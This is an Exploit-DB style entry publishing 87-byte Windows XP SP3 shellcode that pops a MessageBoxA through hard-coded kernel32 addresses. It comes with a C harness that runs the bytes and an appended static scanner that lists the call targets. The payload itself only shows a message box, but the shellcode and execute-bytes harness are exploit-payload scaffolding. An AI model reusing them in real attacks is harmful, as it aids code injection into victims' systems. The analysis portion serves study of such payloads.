# Title : Windows XP SP3 English MessageBoxA Shellcode - 87 bytes
# Published : 2010-08-20
# Author :


/* 
Title: Windows XP SP3 English MessageBoxA Shellcode (87 bytes)
Date: August 20, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Tested on: Windows XP SP3 En
Thanks: ishtus
Greetz: Astalavista, OffSEC, Exploit-DB

EDB Notes:
Tested under Windows XP SP3 Eng
The correct memory address for GetProcAddress() appears to be different on our test machine,
which is 0x7c80ae30.
*/

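#include <stdio.h>
#include <string.h>   /* strlen */

/* Absolute kernel32 addresses below are specific to Windows XP SP3 English. */
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x51\x68\x6c\x6c\x20\x20\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72"
"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" // 0x7c801d7b ; LoadLibraryA(user32.dll)
"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
"\xc1\x11\x11\x11\x11\x51\x68\x61"
"\x67\x65\x42\x68\x4d\x65\x73\x73"
"\x89\xe1\x51\x50\xbb\x40\xae\x80" // 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
"\x51\x51\x52\xff\xd0\x31\xc0\x50"
"\xb8\x12\xcb\x81\x7c\xff\xd0";    // 0x7c81cb12 ; ExitProcess(0)

int main(int argc, char **argv)
{
   /* Treat the byte array as a function and call it. */
   int (*func)();
   func = (int (*)()) shellcode;
   /* The payload contains no NUL bytes, so strlen() gives its full length. */
   printf("Shellcode Length is : %d", (int)strlen(shellcode));
   (*func)();
   return 0;
}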
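
Added example (not part of the original submission or of the EDB notes): the EDB note above reports a different GetProcAddress() address on another XP SP3 machine, which matters because the payload calls absolute addresses. The program below treats the 87 bytes purely as data and lists every immediate that is loaded into a register and then called through it, the static indicator an analyst would extract. The names find_hardcoded_calls and sample and the 2-byte search window are choices made for this example, and the scan is a naive byte match, not a disassembler.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* The 87 bytes from the listing above, held as data only (never executed). */
static const unsigned char sample[] =
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x51\x68\x6c\x6c\x20\x20\x68\x33"
    "\x32\x2e\x64\x68\x75\x73\x65\x72\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
    "\xff\xd3\xb9\x5e\x67\x30\xef\x81\xc1\x11\x11\x11\x11\x51\x68\x61"
    "\x67\x65\x42\x68\x4d\x65\x73\x73\x89\xe1\x51\x50\xbb\x40\xae\x80"
    "\x7c\xff\xd3\x89\xe1\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xc0\x50"
    "\xb8\x12\xcb\x81\x7c\xff\xd0";

/* Naive linear scan: find `mov r32, imm32` (opcode B8+r) whose register is
   then used by `call r32` (FF D0+r) starting within `window` bytes after the
   mov. Stores each such immediate in out[] and returns how many were found. */
size_t find_hardcoded_calls(const unsigned char *buf, size_t len,
                            uint32_t *out, size_t max_out, size_t window)
{
    size_t n = 0;
    for (size_t i = 0; i + 5 <= len && n < max_out; i++) {
        if (buf[i] < 0xB8 || buf[i] > 0xBF)
            continue;
        unsigned reg = buf[i] - 0xB8u;
        uint32_t imm = (uint32_t)buf[i + 1] | (uint32_t)buf[i + 2] << 8 |
                       (uint32_t)buf[i + 3] << 16 | (uint32_t)buf[i + 4] << 24;
        for (size_t j = i + 5; j + 1 < len && j <= i + 5 + window; j++) {
            if (buf[j] == 0xFF && buf[j + 1] == 0xD0u + reg) {
                out[n++] = imm;   /* absolute address used as a call target */
                break;
            }
        }
        i += 4;   /* skip the immediate so it is not re-read as opcodes */
    }
    return n;
}

int main(void)
{
    uint32_t hits[8];
    size_t n = find_hardcoded_calls(sample, sizeof sample - 1, hits, 8, 2);
    for (size_t k = 0; k < n; k++)
        printf("hard-coded call target: 0x%08x\n", (unsigned)hits[k]);
    return 0;
}
```

The `mov ecx` immediate at offset 34 is not reported because no `call ecx` follows it: adding 0x11111111 to it yields the NUL-terminated tail "oxA" of the "MessageBoxA" string that the code pushes onto the stack.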